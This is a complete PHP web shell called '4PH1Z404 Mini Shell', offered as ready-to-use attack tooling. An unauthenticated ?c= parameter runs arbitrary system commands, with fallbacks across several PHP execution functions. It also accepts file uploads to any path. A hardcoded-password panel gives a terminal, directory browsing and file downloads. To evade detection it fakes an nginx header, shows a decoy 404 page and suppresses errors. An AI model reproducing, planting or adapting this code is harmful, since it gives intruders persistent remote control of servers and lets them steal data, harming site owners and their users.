<?php
/*
 * 4PH1Z404 Mini Shell
 * Lightweight, single-file, no dependency
 * Access: ?c=command  |  ?pass=4ph1z404 (full panel)
 */

error_reporting(0);
set_time_limit(0);
ini_set('memory_limit','256M');
ini_set('upload_max_filesize','128M');
ini_set('post_max_size','128M');
ini_set('max_execution_time','0');
ini_set('opcache.enable', 0);

header("X-Powered-By: nginx");
header("Cache-Control: no-store, no-cache");

$auth = "4ph1z404";

// Quick command exec: ?c=whoami
if(isset($_GET['c'])){
    header("Content-Type: text/plain");
    echo "$ ".$_GET['c']."\n";
    echo str_repeat("-",50)."\n";
    $r = '';
    if(function_exists('system')){ob_start();system($_GET['c']);$r=ob_get_clean();}
    elseif(function_exists('exec')){exec($_GET['c'],$o);$r=implode("\n",$o);}
    elseif(function_exists('shell_exec')){$r=shell_exec($_GET['c']);}
    elseif(function_exists('passthru')){ob_start();passthru($_GET['c']);$r=ob_get_clean();}
    elseif(function_exists('popen')){$p=popen($_GET['c'],'r');$r=fread($p,4096);pclose($p);}
    elseif(function_exists('proc_open')){
        $d=[0=>['pipe','r'],1=>['pipe','w'],2=>['pipe','w']];
        $p=proc_open($_GET['c'],$d,$pipes);
        $r=stream_get_contents($pipes[1]);
        fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($p);
    }
    echo $r;
    exit;
}

// File upload: POST f=file
if(isset($_FILES['f'])){
    $dest = isset($_POST['d']) ? $_POST['d'].'/'.$_FILES['f']['name'] : $_FILES['f']['name'];
    if(move_uploaded_file($_FILES['f']['tmp_name'], $dest)){
        echo "OK:".$dest;
    } else {
        echo "FAIL";
    }
    exit;
}

// Full panel
if(!isset($_GET['pass']) || $_GET['pass'] !== $auth){
    http_response_code(404);
    echo "<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1></body></html>";
    exit;
}

$cwd = isset($_POST['cwd']) ? $_POST['cwd'] : getcwd();
$cmd_out = '';
if(isset($_POST['cmd']) && $_POST['cmd'] !== ''){
    $cmd = $_POST['cmd'];
    if(substr($cmd,0,3)==='cd '){
        $nd = substr($cmd,3);
        if($nd==='..'){$cwd=dirname($cwd);}
        elseif(is_dir($nd)){$cwd=realpath($nd);}
        elseif(is_dir($cwd.'/'.$nd)){$cwd=realpath($cwd.'/'.$nd);}
    } else {
        $full = "cd ".escapeshellarg($cwd)." && ".$cmd." 2>&1";
        if(function_exists('shell_exec')){$cmd_out=shell_exec($full);}
        elseif(function_exists('system')){ob_start();system($full);$cmd_out=ob_get_clean();}
        elseif(function_exists('exec')){exec($full,$o);$cmd_out=implode("\n",$o);}
    }
}

$uname = php_uname();
$user = function_exists('posix_getpwuid') ? posix_getpwuid(posix_geteuid())['name'] : get_current_user();
$ip = $_SERVER['SERVER_ADDR'] ?? '?';
$soft = $_SERVER['SERVER_SOFTWARE'] ?? '?';
$php_v = phpversion();
$disk_free = function_exists('disk_free_space') ? round(disk_free_space('/')/(1024*1024*1024),2).'GB' : '?';
$disk_total = function_exists('disk_total_space') ? round(disk_total_space('/')/(1024*1024*1024),2).'GB' : '?';

// File listing
$files = [];
if(is_dir($cwd)){
    $dh = opendir($cwd);
    while(($f = readdir($dh)) !== false){
        $fp = $cwd.'/'.$f;
        $files[] = [
            'name' => $f,
            'type' => is_dir($fp) ? 'dir' : 'file',
            'size' => is_file($fp) ? filesize($fp) : 0,
            'perm' => substr(sprintf('%o', fileperms($fp)), -4),
            'mod'  => date('Y-m-d H:i', filemtime($fp)),
        ];
    }
    closedir($dh);
}
usort($files, function($a,$b){
    if($a['type']!==$b['type']) return $a['type']==='dir'?-1:1;
    return strcasecmp($a['name'],$b['name']);
});

function fmt_size($b){
    if($b<1024)return $b.'B';
    if($b<1048576)return round($b/1024,1).'K';
    if($b<1073741824)return round($b/1048576,1).'M';
    return round($b/1073741824,2).'G';
}
?>
<!DOCTYPE html>
<html>
<head>
<title><?php echo $ip; ?> â€” 4PH1Z404</title>
<meta charset="utf-8">
<style>
*{margin:0;padding:0;box-sizing:border-box}
body{background:#0a0a0a;color:#c8c8c8;font:13px/1.5 'Consolas','Monaco',monospace}
a{color:#5dade2;text-decoration:none}
a:hover{color:#fff;text-decoration:underline}
.hdr{background:#111;border-bottom:1px solid #222;padding:10px 15px;display:flex;justify-content:space-between;align-items:center}
.hdr .brand{color:#e74c3c;font-weight:bold;font-size:15px}
.info{background:#0d0d0d;padding:8px 15px;border-bottom:1px solid #1a1a1a;font-size:11px;color:#666}
.info span{color:#888;margin-right:15px}
.info b{color:#aaa}
.path{background:#111;padding:8px 15px;border-bottom:1px solid #222}
.path a{color:#e67e22;margin:0 2px}
.main{display:flex;height:calc(100vh - 180px)}
.files{flex:1;overflow-y:auto;padding:5px 0}
.files table{width:100%;border-collapse:collapse}
.files th{background:#111;color:#666;text-align:left;padding:5px 10px;font-weight:normal;font-size:11px;text-transform:uppercase;position:sticky;top:0}
.files td{padding:4px 10px;border-bottom:1px solid #111}
.files tr:hover{background:#111}
.files .dir a{color:#f39c12}
.files .file a{color:#bbb}
.files .sz{color:#555;text-align:right}
.files .pm{color:#444;font-size:11px}
.files .dt{color:#444;font-size:11px}
.term{border-top:1px solid #222;background:#080808;padding:10px 15px}
.term pre{background:#050505;color:#0f0;padding:10px;margin:5px 0;max-height:200px;overflow-y:auto;font-size:12px;border:1px solid #1a1a1a;white-space:pre-wrap;word-break:break-all}
.term form{display:flex;align-items:center;gap:5px}
.term .prompt{color:#e74c3c;white-space:nowrap}
.term input[type=text]{flex:1;background:#111;border:1px solid #222;color:#eee;padding:6px 10px;font:13px 'Consolas',monospace;outline:none}
.term input[type=text]:focus{border-color:#e74c3c}
.term button{background:#e74c3c;color:#fff;border:none;padding:6px 15px;cursor:pointer;font:12px 'Consolas',monospace}
.upl{padding:8px 15px;background:#0d0d0d;border-top:1px solid #1a1a1a;display:flex;align-items:center;gap:10px}
.upl input[type=file]{color:#666;font-size:12px}
.upl button{background:#27ae60;color:#fff;border:none;padding:5px 12px;cursor:pointer;font-size:12px}
</style>
</head>
<body>
<div class="hdr">
    <span class="brand">4PH1Z404 SHELL</span>
    <span style="color:#444;font-size:11px"><?php echo date('Y-m-d H:i:s'); ?></span>
</div>
<div class="info">
    <span>OS: <b><?php echo php_uname('s').' '.php_uname('r'); ?></b></span>
    <span>User: <b><?php echo $user; ?></b></span>
    <span>PHP: <b><?php echo $php_v; ?></b></span>
    <span>Server: <b><?php echo $soft; ?></b></span>
    <span>IP: <b><?php echo $ip; ?></b></span>
    <span>Disk: <b><?php echo $disk_free.'/'.$disk_total; ?></b></span>
</div>
<div class="path">
    <?php
    $parts = explode('/', trim($cwd, '/'));
    $built = '';
    echo '<a href="?pass='.$auth.'&cwd=/">/</a>';
    foreach($parts as $p){
        $built .= '/'.$p;
        echo '<a href="?pass='.$auth.'&cwd='.urlencode($built).'">'.$p.'</a>/';
    }
    ?>
</div>
<div class="files">
<table>
<tr><th>Name</th><th style="width:70px">Size</th><th style="width:50px">Perm</th><th style="width:130px">Modified</th></tr>
<?php foreach($files as $f): ?>
<tr>
    <td class="<?php echo $f['type']; ?>">
        <?php if($f['type']==='dir'): ?>
            <a href="?pass=<?php echo $auth; ?>&cwd=<?php echo urlencode($cwd.'/'.$f['name']); ?>">[<?php echo htmlspecialchars($f['name']); ?>]</a>
        <?php else: ?>
            <a href="?pass=<?php echo $auth; ?>&dl=<?php echo urlencode($cwd.'/'.$f['name']); ?>"><?php echo htmlspecialchars($f['name']); ?></a>
        <?php endif; ?>
    </td>
    <td class="sz"><?php echo $f['type']==='file' ? fmt_size($f['size']) : '-'; ?></td>
    <td class="pm"><?php echo $f['perm']; ?></td>
    <td class="dt"><?php echo $f['mod']; ?></td>
</tr>
<?php endforeach; ?>
</table>
</div>
<div class="term">
    <?php if($cmd_out): ?>
    <pre><?php echo htmlspecialchars($cmd_out); ?></pre>
    <?php endif; ?>
    <form method="post" action="?pass=<?php echo $auth; ?>">
        <input type="hidden" name="cwd" value="<?php echo htmlspecialchars($cwd); ?>">
        <span class="prompt"><?php echo $user.'@'.$ip; ?>:<?php echo $cwd; ?>$</span>
        <input type="text" name="cmd" autofocus autocomplete="off" placeholder="Enter command...">
        <button type="submit">Run</button>
    </form>
</div>
<div class="upl">
    <form method="post" enctype="multipart/form-data" action="?pass=<?php echo $auth; ?>">
        <input type="hidden" name="cwd" value="<?php echo htmlspecialchars($cwd); ?>">
        <input type="file" name="f">
        <button type="submit">Upload</button>
    </form>
</div>
<?php
// File download handler
if(isset($_GET['dl'])){
    $dlf = $_GET['dl'];
    if(is_file($dlf) && is_readable($dlf)){
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="'.basename($dlf).'"');
        header('Content-Length: '.filesize($dlf));
        readfile($dlf);
        exit;
    }
}
?>
</body>
</html>
